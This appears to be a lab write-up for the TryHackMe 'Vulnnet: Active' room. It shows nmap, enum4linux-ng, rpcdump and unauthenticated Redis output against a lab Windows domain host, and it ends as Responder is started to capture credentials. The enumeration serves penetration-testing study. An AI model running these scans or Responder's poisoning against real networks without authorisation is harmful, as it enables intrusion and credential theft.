TryHackMe Vulnnet: Active

Requirements

enum4linux-ng
redis
haiti
john
smbmap
crackmapexec
metasploit
powersploit
smbclient
nullinux
villain

nmap

nmap -sV -p- -Pn 10.10.22.71 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 20:39 EST
Nmap scan report for 10.10.22.71
Host is up (0.086s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
6379/tcp  open  redis         Redis key-value store 2.8.2402
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.02 seconds

enum4linux (smb enumeration)

enum4linux-ng -A 10.10.22.71                                                   
ENUM4LINUX - next generation (v1.3.2)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.10.22.71
[*] Username ......... ''
[*] Random Username .. 'emrlcivn'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 ====================================
|    Listener Scan on 10.10.22.71    |
 ====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ==========================================================
|    NetBIOS Names and Workgroup/Domain for 10.10.22.71    |
 ==========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

 ========================================
|    SMB Dialect Check on 10.10.22.71    |
 ========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

 ==========================================================
|    Domain Information via SMB session for 10.10.22.71    |
 ==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
Derived membership: domain member
Derived domain: VULNNET

 ========================================
|    RPC Session Check on 10.10.22.71    |
 ========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 ==================================================
|    Domain Information via RPC for 10.10.22.71    |
 ==================================================
[+] Domain: VULNNET
[+] Domain SID: S-1-5-21-1405206085-1650434706-76331420
[+] Membership: domain member

 ==============================================
|    OS Information via RPC for 10.10.22.71    |
 ==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

 ====================================
|    Users via RPC on 10.10.22.71    |
 ====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED

 =====================================
|    Groups via RPC on 10.10.22.71    |
 =====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED

 =====================================
|    Shares via RPC on 10.10.22.71    |
 =====================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

 ========================================
|    Policies via RPC for 10.10.22.71    |
 ========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed

 ========================================
|    Printers via RPC for 10.10.22.71    |
 ========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 31.42 seconds

impacket-rpcdump

Protocol: N/A 
Provider: dhcpcsvc.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.22.71[49666]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-7d265659bc77895aff]
          ncalrpc:[LRPC-3187d6a163373599c6]
          ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]

Protocol: N/A 
Provider: dhcpcsvc6.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.22.71[49666]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-7d265659bc77895aff]
          ncalrpc:[LRPC-3187d6a163373599c6]
          ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol 
Provider: wevtsvc.dll 
UUID    : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings: 
          ncacn_ip_tcp:10.10.22.71[49666]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-7d265659bc77895aff]
          ncalrpc:[LRPC-3187d6a163373599c6]
          ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]

Protocol: N/A 
Provider: N/A 
UUID    : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 
Bindings: 
          ncalrpc:[LRPC-7d265659bc77895aff]
          ncalrpc:[LRPC-3187d6a163373599c6]
          ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]

Protocol: N/A 
Provider: nrpsrv.dll 
UUID    : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings: 
          ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]

Protocol: N/A 
Provider: N/A 
UUID    : A4B8D482-80CE-40D6-934D-B22A01A44FE7 v1.0 LicenseManager
Bindings: 
          ncalrpc:[LicenseServiceEndpoint]

Protocol: N/A 
Provider: nsisvc.dll 
UUID    : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings: 
          ncalrpc:[LRPC-061754b666383f2114]

Protocol: N/A 
Provider: N/A 
UUID    : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs
Bindings: 
          ncalrpc:[TeredoControl]
          ncalrpc:[TeredoDiagnostics]
          ncalrpc:[LRPC-eb2cc8830176e6f2c7]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: N/A 
Provider: N/A 
UUID    : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint
Bindings: 
          ncalrpc:[TeredoControl]
          ncalrpc:[TeredoDiagnostics]
          ncalrpc:[LRPC-eb2cc8830176e6f2c7]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: N/A 
Provider: N/A 
UUID    : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint
Bindings: 
          ncalrpc:[TeredoControl]
          ncalrpc:[TeredoDiagnostics]
          ncalrpc:[LRPC-eb2cc8830176e6f2c7]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: N/A 
Provider: iphlpsvc.dll 
UUID    : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings: 
          ncalrpc:[LRPC-eb2cc8830176e6f2c7]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: N/A 
Provider: N/A 
UUID    : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings: 
          ncalrpc:[LRPC-eb2cc8830176e6f2c7]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: N/A 
Provider: N/A 
UUID    : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings: 
          ncalrpc:[LRPC-eb2cc8830176e6f2c7]
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: N/A 
Provider: N/A 
UUID    : 29770A8F-829B-4158-90A2-78CD488501F7 v1.0 
Bindings: 
          ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
          ncalrpc:[SessEnvPrivateRpc]
          ncacn_ip_tcp:10.10.22.71[49667]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[DeviceSetupManager]
          ncalrpc:[senssvc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]

Protocol: [MS-CMPO]: MSDTC Connection Manager: 
Provider: msdtcprx.dll 
UUID    : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 
Bindings: 
          ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
          ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
          ncalrpc:[LRPC-d9b0f5b8856e36d3d1]

Protocol: N/A 
Provider: N/A 
UUID    : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0 
Bindings: 
          ncalrpc:[LRPC-166c27802e6b73c6ed]

Protocol: N/A 
Provider: N/A 
UUID    : FD8BE72B-A9CD-4B2C-A9CA-4DED242FBE4D v1.0 
Bindings: 
          ncalrpc:[LRPC-166c27802e6b73c6ed]

Protocol: N/A 
Provider: N/A 
UUID    : 95095EC8-32EA-4EB0-A3E2-041F97B36168 v1.0 
Bindings: 
          ncalrpc:[LRPC-166c27802e6b73c6ed]

Protocol: N/A 
Provider: N/A 
UUID    : E38F5360-8572-473E-B696-1B46873BEEAB v1.0 
Bindings: 
          ncalrpc:[LRPC-166c27802e6b73c6ed]

Protocol: N/A 
Provider: N/A 
UUID    : D22895EF-AFF4-42C5-A5B2-B14466D34AB4 v1.0 
Bindings: 
          ncalrpc:[LRPC-166c27802e6b73c6ed]

Protocol: N/A 
Provider: N/A 
UUID    : 98CD761E-E77D-41C8-A3C0-0FB756D90EC2 v1.0 
Bindings: 
          ncalrpc:[LRPC-166c27802e6b73c6ed]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol 
Provider: dfsrmig.exe 
UUID    : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings: 
          ncalrpc:[OLEF2A96DE6D564C95BCA50BFBAE58E]
          ncacn_ip_tcp:10.10.22.71[49720]

Protocol: N/A 
Provider: N/A 
UUID    : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 
Bindings: 
          ncalrpc:[LRPC-2656bdde0795bfccbd]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management 
Provider: dns.exe 
UUID    : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 
Bindings: 
          ncacn_ip_tcp:10.10.22.71[49696]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:10.10.22.71[49694]

Protocol: N/A 
Provider: sppsvc.exe 
UUID    : 9435CC56-1D9C-4924-AC7D-B60A2C3520E1 v1.0 SPPSVC Default RPC Interface
Bindings: 
          ncalrpc:[SPPCTransportEndpoint-00001]

Protocol: N/A 
Provider: N/A 
UUID    : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings: 
          ncalrpc:[LRPC-4e8e9db7c66657829c]

Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncalrpc:[LRPC-b3e5db05dae5d67c84]
          ncacn_ip_tcp:10.10.22.71[49683]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol 
Provider: spoolsv.exe 
UUID    : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0 
Bindings: 
          ncalrpc:[LRPC-b3e5db05dae5d67c84]
          ncacn_ip_tcp:10.10.22.71[49683]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol 
Provider: spoolsv.exe 
UUID    : AE33069B-A2A8-46EE-A235-DDFD339BE281 v1.0 
Bindings: 
          ncalrpc:[LRPC-b3e5db05dae5d67c84]
          ncacn_ip_tcp:10.10.22.71[49683]

Protocol: N/A 
Provider: spoolsv.exe 
UUID    : 4A452661-8290-4B36-8FBE-7F4093A94978 v1.0 
Bindings: 
          ncalrpc:[LRPC-b3e5db05dae5d67c84]
          ncacn_ip_tcp:10.10.22.71[49683]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Provider: spoolsv.exe 
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0 
Bindings: 
          ncalrpc:[LRPC-b3e5db05dae5d67c84]
          ncacn_ip_tcp:10.10.22.71[49683]

Protocol: N/A 
Provider: srvsvc.dll 
UUID    : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings: 
          ncalrpc:[LRPC-20e00a11ef5c9a4cb8]

Protocol: N/A 
Provider: N/A 
UUID    : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings: 
          ncalrpc:[LRPC-20e00a11ef5c9a4cb8]

Protocol: N/A 
Provider: BFE.DLL 
UUID    : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings: 
          ncalrpc:[LRPC-87de8d013ce3134508]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-87de8d013ce3134508]
          ncalrpc:[LRPC-0452539d4b61802f71]

Protocol: N/A 
Provider: N/A 
UUID    : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-87de8d013ce3134508]
          ncalrpc:[LRPC-0452539d4b61802f71]
          ncalrpc:[LRPC-4bbd50221c73d874bb]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-87de8d013ce3134508]
          ncalrpc:[LRPC-0452539d4b61802f71]
          ncalrpc:[LRPC-4bbd50221c73d874bb]
          ncalrpc:[LRPC-d730bac2ce4fb8e128]

Protocol: N/A 
Provider: N/A 
UUID    : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 
Bindings: 
          ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
          ncalrpc:[LRPC-b7bfb08c881ef0c4db]

Protocol: N/A 
Provider: N/A 
UUID    : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 
Bindings: 
          ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
          ncalrpc:[LRPC-b7bfb08c881ef0c4db]

Protocol: N/A 
Provider: N/A 
UUID    : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 
Bindings: 
          ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
          ncalrpc:[LRPC-b7bfb08c881ef0c4db]

Protocol: N/A 
Provider: N/A 
UUID    : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 
Bindings: 
          ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
          ncalrpc:[LRPC-b7bfb08c881ef0c4db]

Protocol: N/A 
Provider: N/A 
UUID    : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 
Bindings: 
          ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
          ncalrpc:[LRPC-b7bfb08c881ef0c4db]

Protocol: N/A 
Provider: N/A 
UUID    : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 
Bindings: 
          ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
          ncalrpc:[LRPC-b7bfb08c881ef0c4db]

Protocol: N/A 
Provider: N/A 
UUID    : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings: 
          ncalrpc:[DNSResolver]
          ncalrpc:[nlaplg]
          ncalrpc:[nlaapi]

Protocol: N/A 
Provider: N/A 
UUID    : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings: 
          ncalrpc:[DNSResolver]
          ncalrpc:[nlaplg]
          ncalrpc:[nlaapi]

Protocol: N/A 
Provider: N/A 
UUID    : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings: 
          ncalrpc:[DNSResolver]
          ncalrpc:[nlaplg]
          ncalrpc:[nlaapi]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\wkssvc]

Protocol: N/A 
Provider: certprop.dll 
UUID    : 30B044A5-A225-43F0-B3A4-E060DF91F9C1 v1.0 
Bindings: 
          ncalrpc:[LRPC-deb93f84a023ce791c]

Protocol: N/A 
Provider: gpsvc.dll 
UUID    : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings: 
          ncalrpc:[LRPC-ca164f4be6783b3691]

Protocol: N/A 
Provider: schedsvc.dll 
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 
Bindings: 
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[senssvc]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[senssvc]
          ncalrpc:[DeviceSetupManager]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[senssvc]
          ncalrpc:[DeviceSetupManager]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]

Protocol: N/A 
Provider: N/A 
UUID    : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 
Bindings: 
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[senssvc]
          ncalrpc:[DeviceSetupManager]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[ubpmtaskhostchannel]
          ncalrpc:[LRPC-ad7a31532f4c443127]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[senssvc]
          ncalrpc:[DeviceSetupManager]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[ubpmtaskhostchannel]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncacn_ip_tcp:10.10.22.71[49667]

Protocol: N/A 
Provider: N/A 
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 
Bindings: 
          ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
          ncalrpc:[LRPC-b78b428e89a8c373fc]
          ncalrpc:[IUserProfile2]
          ncalrpc:[senssvc]
          ncalrpc:[DeviceSetupManager]
          ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
          ncalrpc:[ubpmtaskhostchannel]
          ncalrpc:[LRPC-ad7a31532f4c443127]
          ncacn_ip_tcp:10.10.22.71[49667]

[*] Received 621 endpoints.

redis enumeration

redis-cli -h 10.10.22.71
10.10.22.71:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows  
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:2592
run_id:4c9e17ea384739b0ed8265045c91514c774746c4
tcp_port:6379
uptime_in_seconds:2488
uptime_in_days:0
hz:10
lru_clock:12858312
config_file:

# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:970376
used_memory_human:947.63K
used_memory_rss:936832
used_memory_peak:994688
used_memory_peak_human:971.38K
used_memory_lua:36864
mem_fragmentation_ratio:0.97
mem_allocator:dlmalloc-2.8

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1707354640
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok

# Stats
total_connections_received:3
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0

# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.94
used_cpu_user:1.23
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Keyspace
10.10.22.71:6379> CONFIG GET *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "unixsocket"
  8) ""
  9) "logfile"
 10) ""
 11) "pidfile"
 12) "/var/run/redis.pid"
 13) "maxmemory"
 14) "0"
 15) "maxmemory-samples"
 16) "3"
 17) "timeout"
 18) "0"
 19) "tcp-keepalive"
 20) "0"
 21) "auto-aof-rewrite-percentage"
 22) "100"
 23) "auto-aof-rewrite-min-size"
 24) "67108864"
 25) "hash-max-ziplist-entries"
 26) "512"
 27) "hash-max-ziplist-value"
 28) "64"
 29) "list-max-ziplist-entries"
 30) "512"
 31) "list-max-ziplist-value"
 32) "64"
 33) "set-max-intset-entries"
 34) "512"
 35) "zset-max-ziplist-entries"
 36) "128"
 37) "zset-max-ziplist-value"
 38) "64"
 39) "hll-sparse-max-bytes"
 40) "3000"
 41) "lua-time-limit"
 42) "5000"
 43) "slowlog-log-slower-than"
 44) "10000"
 45) "latency-monitor-threshold"
 46) "0"
 47) "slowlog-max-len"
 48) "128"
 49) "port"
 50) "6379"
 51) "tcp-backlog"
 52) "511"
 53) "databases"
 54) "16"
 55) "repl-ping-slave-period"
 56) "10"
 57) "repl-timeout"
 58) "60"
 59) "repl-backlog-size"
 60) "1048576"
 61) "repl-backlog-ttl"
 62) "3600"
 63) "maxclients"
 64) "10000"
 65) "watchdog-period"
 66) "0"
 67) "slave-priority"
 68) "100"
 69) "min-slaves-to-write"
 70) "0"
 71) "min-slaves-max-lag"
 72) "10"
 73) "hz"
 74) "10"
 75) "repl-diskless-sync-delay"
 76) "5"
 77) "no-appendfsync-on-rewrite"
 78) "no"
 79) "slave-serve-stale-data"
 80) "yes"
 81) "slave-read-only"
 82) "yes"
 83) "stop-writes-on-bgsave-error"
 84) "yes"
 85) "daemonize"
 86) "no"
 87) "rdbcompression"
 88) "yes"
 89) "rdbchecksum"
 90) "yes"
 91) "activerehashing"
 92) "yes"
 93) "repl-disable-tcp-nodelay"
 94) "no"
 95) "repl-diskless-sync"
 96) "no"
 97) "aof-rewrite-incremental-fsync"
 98) "yes"
 99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "jd 3600 jd 300 jd 60"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) ""
121) "bind"
122) ""

Redis version 2.8.2402 username is enterprise-security

responder (run this in another tab)

sudo responder -I tun0 -dvw 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
